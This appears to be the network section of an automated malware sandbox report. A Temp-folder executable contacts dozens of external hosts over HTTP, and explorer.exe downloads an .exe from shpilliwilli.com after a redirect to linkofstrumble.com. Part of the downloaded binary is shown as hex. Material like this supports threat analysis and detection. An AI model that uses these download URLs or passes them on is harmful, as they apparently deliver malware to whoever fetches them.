Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
551	192.168.2.4	54189	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
552	192.168.2.4	54190	192.178.50.46	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
553	192.168.2.4	54132	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
554	192.168.2.4	54452	104.21.52.80	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
555	192.168.2.4	54103	116.90.51.60	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
556	192.168.2.4	54112	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
557	192.168.2.4	55013	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
558	192.168.2.4	55061	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
559	192.168.2.4	55056	35.197.165.27	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
560	192.168.2.4	55224	209.124.80.122	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
561	192.168.2.4	55193	167.235.0.29	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
562	192.168.2.4	55194	62.149.128.40	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
563	192.168.2.4	55291	104.21.52.80	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
564	192.168.2.4	55506	205.178.189.129	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
565	192.168.2.4	55451	54.161.222.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
566	192.168.2.4	55478	35.168.67.138	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
567	192.168.2.4	55553	104.21.69.169	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
568	192.168.2.4	55580	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
569	192.168.2.4	55584	3.33.130.190	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
570	192.168.2.4	55583	13.248.169.48	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
571	192.168.2.4	55575	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
572	192.168.2.4	55577	3.94.41.167	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
573	192.168.2.4	55600	34.205.242.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
574	192.168.2.4	55593	50.31.65.5	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
575	192.168.2.4	55666	69.42.204.12	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
576	192.168.2.4	55570	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
577	192.168.2.4	55504	167.235.0.29	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
578	192.168.2.4	55714	3.94.41.167	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
579	192.168.2.4	55716	54.161.222.85	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
580	192.168.2.4	55718	34.136.28.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
581	192.168.2.4	55794	216.194.166.146	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
582	192.168.2.4	55845	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
583	192.168.2.4	55703	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
584	192.168.2.4	56209	209.124.80.122	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
585	192.168.2.4	56515	34.206.39.153	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
586	192.168.2.4	56456	192.178.50.46	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
587	192.168.2.4	56718	141.193.213.10	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
588	192.168.2.4	56903	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
589	192.168.2.4	56605	3.126.94.219	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
590	192.168.2.4	56793	38.177.197.58	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
591	192.168.2.4	56991	52.165.155.237	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
592	192.168.2.4	57609	104.17.71.73	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
593	192.168.2.4	57696	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
594	192.168.2.4	57529	91.132.253.137	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
595	192.168.2.4	57700	69.42.204.12	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
596	192.168.2.4	57600	64.68.191.221	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
597	192.168.2.4	57698	89.46.108.50	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
598	192.168.2.4	57503	218.213.216.3	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
599	192.168.2.4	57906	167.235.0.29	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
600	192.168.2.4	58509	104.21.52.80	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
601	192.168.2.4	58510	89.46.108.50	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
602	192.168.2.4	58680	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
603	192.168.2.4	58815	35.197.165.27	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
604	192.168.2.4	59395	89.46.108.50	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
605	192.168.2.4	59539	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
606	192.168.2.4	59544	209.124.80.122	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
607	192.168.2.4	59578	35.168.67.138	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
608	192.168.2.4	59688	104.24.82.4	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
609	192.168.2.4	59695	167.235.0.29	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
610	192.168.2.4	59546	218.213.216.3	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
611	192.168.2.4	59784	89.46.108.50	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
612	192.168.2.4	60352	3.126.94.219	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
613	192.168.2.4	60868	104.24.82.4	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
614	192.168.2.4	60798	216.194.166.146	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
615	192.168.2.4	61089	104.21.52.80	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
616	192.168.2.4	61739	91.215.85.17	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
617	192.168.2.4	61740	2.180.10.7	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
618	192.168.2.4	62674	91.215.85.17	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
619	192.168.2.4	62676	91.215.85.17	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
620	192.168.2.4	62678	91.215.85.17	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
621	192.168.2.4	62680	91.215.85.17	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
622	192.168.2.4	62684	91.215.85.17	80

Timestamp	Bytes transferred	Direction	Data

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49755	172.67.215.49	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:12:37 UTC	190	OUT	GET /288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: shpilliwilli.com
2023-12-22 20:12:38 UTC	698	IN	HTTP/1.1 307 Temporary Redirect Date: Fri, 22 Dec 2023 20:12:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://linkofstrumble.com/e0c371ddca2abf5274ea12d860ff6dcd/288c47bbc1871b439df19ff4df68f076.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lPL2I653irBvHcW%2B9%2FM7O5CtN2jBpVK9QdAsbgS6IuNNY0QwO6EOtPUcfl7GB7lZSafqDIfnMON9E2Cm6fDcnQgvMY7k1wENpJmy%2BcQOKsAWEknOjWYL%2BQc83dUamkUifri0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0551798274b0-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:12:38 UTC	138	IN	Data Raw: 38 34 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 6f 66 73 74 72 75 6d 62 6c 65 2e 63 6f 6d 2f 65 30 63 33 37 31 64 64 63 61 32 61 62 66 35 32 37 34 65 61 31 32 64 38 36 30 66 66 36 64 63 64 2f 32 38 38 63 34 37 62 62 63 31 38 37 31 62 34 33 39 64 66 31 39 66 66 34 64 66 36 38 66 30 37 36 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a Data Ascii: 84<a href="https://linkofstrumble.com/e0c371ddca2abf5274ea12d860ff6dcd/288c47bbc1871b439df19ff4df68f076.exe">Temporary Redirect</a>.
2023-12-22 20:12:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49756	172.67.185.93	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:12:38 UTC	225	OUT	GET /e0c371ddca2abf5274ea12d860ff6dcd/288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: linkofstrumble.com
2023-12-22 20:12:39 UTC	696	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:12:38 GMT Content-Type: application/x-ms-dos-executable Content-Length: 4479880 Connection: close Last-Modified: Fri, 22 Dec 2023 18:59:46 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 360 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nqxNbAzrQurco%2FGdo7OsarxbpeDkTMtFIhi6qrUv6ZoVRWKTLi1UT534DEJjkq7%2B%2Bg6tSsJa2rXXHk%2BVfvVrcUH%2F%2FHVb7cprGt0oZI8deTq%2B%2FRGCqedVjWPqe0AcbXceN1dLNe4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0557aa4f9abf-MIA alt-svc: h3=":443"; ma=86400
2023-12-22 20:12:39 UTC	673	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9b a4 a9 a0 df c5 c7 f3 df c5 c7 f3 df c5 c7 f3 c1 97 43 f3 f6 c5 c7 f3 c1 97 52 f3 c5 c5 c7 f3 c1 97 44 f3 50 c5 c7 f3 f8 03 bc f3 d8 c5 c7 f3 df c5 c6 f3 58 c5 c7 f3 c1 97 4d f3 de c5 c7 f3 c1 97 53 f3 de c5 c7 f3 c1 97 56 f3 de c5 c7 f3 52 69 63 68 df c5 c7 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 16 3f fa 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 e2 41 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CRDPXMSVRichPEL?cA
2023-12-22 20:12:39 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2023-12-22 20:12:39 UTC	1369	IN	Data Raw: ec 8d 45 0c 50 ff 75 08 e8 3f 20 00 00 59 59 5d c3 8b ff 55 8b ec 8d 45 10 50 ff 75 0c ff 75 08 e8 0a 20 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 8d 45 10 50 ff 75 0c ff 75 08 e8 2a 20 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 66 23 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 cb 1d 00 00 85 c0 74 0a e8 c2 1d 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 6a 0c 68 20 23 82 00 e8 07 26 00 00 33 c0 33 f6 39 75 0c 0f 95 c0 3b c6 75 1d e8 99 1d 00 00 c7 00 16 00 00 00 56 56 56 56 56 e8 06 1d 00 00 83 c4 14 83 c8 ff eb 38 e8 22 24 00 00 50 56 e8 33 25 00 00 59 59 89 75 fc ff 75 14 ff 75 10 ff 75 0c e8 08 24 00 00 50 ff 55 08 83 c4 10 89 45 e4 c7 45 fc fe ff ff ff e8 0b 00 00 00 8b 45 e4 e8 e4 25 00 00 c3 33 f6 e8 e2 23 00 00 Data Ascii: EPu? YY]UEPuu ]UEPuu* ]UQeVEPuuf#u9EttM^jh #&339u;uVVVVV8"$PV3%YYuuuu$PUEEE%3#
2023-12-22 20:12:39 UTC	1369	IN	Data Raw: 00 00 3b f3 74 07 8b 7d 0c 3b fb 77 10 e8 d0 18 00 00 c7 00 16 00 00 00 e9 95 00 00 00 e8 c0 18 00 00 ff 75 1c ff 75 18 ff 75 14 3b 7d 10 76 2d 8b 38 8b 45 10 40 50 56 68 e7 75 40 00 e8 86 fd ff ff 83 c4 18 83 f8 fe 75 4b e8 93 18 00 00 83 38 22 75 6b e8 89 18 00 00 89 38 eb 62 8b 18 57 56 68 e7 75 40 00 e8 5d fd ff ff 33 c9 83 c4 18 66 89 4c 7e fe 83 f8 fe 75 19 83 7d 10 ff 75 1b e8 5d 18 00 00 83 38 22 75 35 e8 53 18 00 00 89 18 eb 2c 33 db 3b c3 7d 29 eb 02 33 db 33 c9 66 89 0e 83 f8 fe 75 18 e8 36 18 00 00 c7 00 22 00 00 00 53 53 53 53 53 e8 a3 17 00 00 83 c4 14 83 c8 ff 5f 5e 5b 5d c3 8b ff 55 8b ec ff 75 18 6a 00 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 d9 fe ff ff 83 c4 18 5d c3 8b ff 55 8b ec ff 75 14 6a 00 ff 75 10 ff 75 0c ff 75 08 68 dd 82 40 00 Data Ascii: ;t};wuuu;}v-8E@PVhu@uK8"uk8bWVhu@]3fL~u}u]8"u5S,3;})33fu6"SSSSS_^[]Uujuuuu]Uujuuuh@
2023-12-22 20:12:39 UTC	1369	IN	Data Raw: ff 55 8b ec 6a 00 6a 01 ff 75 08 e8 ad fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 9d fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 8e fe ff ff 83 c4 0c c3 8b ff 56 e8 ba 7b 00 00 8b f0 56 e8 e9 92 00 00 56 e8 74 92 00 00 56 e8 41 11 00 00 56 e8 59 92 00 00 56 e8 bd 8f 00 00 56 e8 bb 8a 00 00 56 e8 ff 88 00 00 56 e8 e8 88 00 00 68 ab 1e 40 00 e8 0c 7b 00 00 83 c4 24 a3 00 40 82 00 5e c3 8b ff 55 8b ec 83 3d 5c 63 82 00 01 75 05 e8 38 83 00 00 ff 75 08 e8 5f 81 00 00 68 ff 00 00 00 e8 af fc ff ff 59 59 5d c3 b8 4d 5a 00 00 66 39 05 00 00 40 00 75 36 a1 3c 00 40 00 81 b8 00 00 40 00 50 45 00 00 75 25 b9 0b 01 00 00 66 39 88 18 00 40 00 75 17 83 b8 74 00 40 00 0e 76 0e 33 c9 39 88 e8 00 40 00 0f 95 c1 8b c1 c3 33 c0 c3 6a 58 68 80 23 82 00 e8 e7 1a 00 00 33 f6 Data Ascii: Ujju]jjjjjjV{VVtVAVYVVVVh@{$@^U=\cu8u_hYY]MZf9@u6<@@PEu%f9@ut@v39@3jXh#3
2023-12-22 20:12:39 UTC	1369	IN	Data Raw: 08 89 0e 8b 40 04 89 46 04 8b c6 5e 5d c2 04 00 80 79 0c 00 74 07 8b 41 08 83 60 70 fd c3 8b c1 c3 f6 41 0c 40 74 06 83 79 08 00 74 24 ff 49 04 78 0b 8b 11 88 02 ff 01 0f b6 c0 eb 0c 0f be c0 51 50 e8 de fd ff ff 59 59 83 f8 ff 75 03 09 06 c3 ff 06 c3 8b ff 55 8b ec 56 8b f0 eb 13 8b 4d 10 8a 45 08 ff 4d 0c e8 b5 ff ff ff 83 3e ff 74 06 83 7d 0c 00 7f e7 5e 5d c3 8b ff 55 8b ec 8b 45 08 83 00 04 8b 00 8b 40 fc 5d c3 8b ff 55 8b ec 8b 45 08 83 00 04 8b 00 66 8b 40 fc 5d c3 8b ff 55 8b ec 81 ec 78 02 00 00 a1 08 40 82 00 33 c5 89 45 fc 53 8b 5d 0c 56 8b 75 08 33 c0 57 8b 7d 14 ff 75 10 8d 8d a4 fd ff ff 89 b5 b4 fd ff ff 89 bd dc fd ff ff 89 85 b8 fd ff ff 89 85 f0 fd ff ff 89 85 cc fd ff ff 89 85 e8 fd ff ff 89 85 d0 fd ff ff 89 85 c0 fd ff ff 89 85 c8 fd Data Ascii: @F^]ytA`pA@tyt$IxQPYYuUVMEM>t}^]UE@]UEf@]Ux@3ES]Vu3W}u
2023-12-22 20:12:39 UTC	1369	IN	Data Raw: 89 bd e4 fd ff ff 0f 84 b1 04 00 00 3b fe 75 0b a1 14 40 82 00 89 85 e4 fd ff ff 8b 85 e4 fd ff ff c7 85 c8 fd ff ff 01 00 00 00 e9 7f 04 00 00 83 e8 58 0f 84 da 02 00 00 48 48 74 79 2b c1 0f 84 27 ff ff ff 48 48 0f 85 9e 04 00 00 83 c7 04 f7 85 f0 fd ff ff 10 08 00 00 89 bd dc fd ff ff 74 30 0f b7 47 fc 50 68 00 02 00 00 8d 85 f4 fd ff ff 50 8d 85 e0 fd ff ff 50 e8 7a b9 00 00 83 c4 10 85 c0 74 1f c7 85 c0 fd ff ff 01 00 00 00 eb 13 8a 47 fc 88 85 f4 fd ff ff c7 85 e0 fd ff ff 01 00 00 00 8d 85 f4 fd ff ff 89 85 e4 fd ff ff e9 35 04 00 00 8b 07 83 c7 04 89 bd dc fd ff ff 3b c6 74 3b 8b 48 04 3b ce 74 34 f7 85 f0 fd ff ff 00 08 00 00 0f bf 00 89 8d e4 fd ff ff 74 14 99 2b c2 d1 f8 c7 85 c8 fd ff ff 01 00 00 00 e9 f0 03 00 00 89 b5 c8 fd ff ff e9 e5 03 00 Data Ascii: ;u@XHHty+'HHt0GPhPPztG5;t;H;t4t+
2023-12-22 20:12:39 UTC	1369	IN	Data Raw: ff ff 53 6a 20 e8 98 f5 ff ff 83 c4 0c ff b5 d0 fd ff ff 8b bd b4 fd ff ff 8d 85 d8 fd ff ff 8d 8d d4 fd ff ff e8 cf b9 00 00 f6 85 f0 fd ff ff 08 59 74 1b f6 85 f0 fd ff ff 04 75 12 57 53 6a 30 8d 85 d8 fd ff ff e8 56 f5 ff ff 83 c4 0c 83 bd c8 fd ff ff 00 8b 85 e0 fd ff ff 74 66 85 c0 7e 62 8b b5 e4 fd ff ff 89 85 a0 fd ff ff 0f b7 06 ff 8d a0 fd ff ff 50 6a 06 8d 45 f4 50 8d 85 98 fd ff ff 46 50 46 e8 14 b4 00 00 83 c4 10 85 c0 75 28 39 85 98 fd ff ff 74 20 ff b5 98 fd ff ff 8d 85 d8 fd ff ff 8d 4d f4 e8 4a b9 00 00 83 bd a0 fd ff ff 00 59 75 b5 eb 1c 83 8d d8 fd ff ff ff eb 13 8b 8d e4 fd ff ff 50 8d 85 d8 fd ff ff e8 23 b9 00 00 59 83 bd d8 fd ff ff 00 7c 1b f6 85 f0 fd ff ff 04 74 12 57 53 6a 20 8d 85 d8 fd ff ff e8 aa f4 ff ff 83 c4 0c 83 bd bc fd Data Ascii: Sj YtuWSj0Vtf~bPjEPFPFu(9t MJYuP#Y\|tWSj
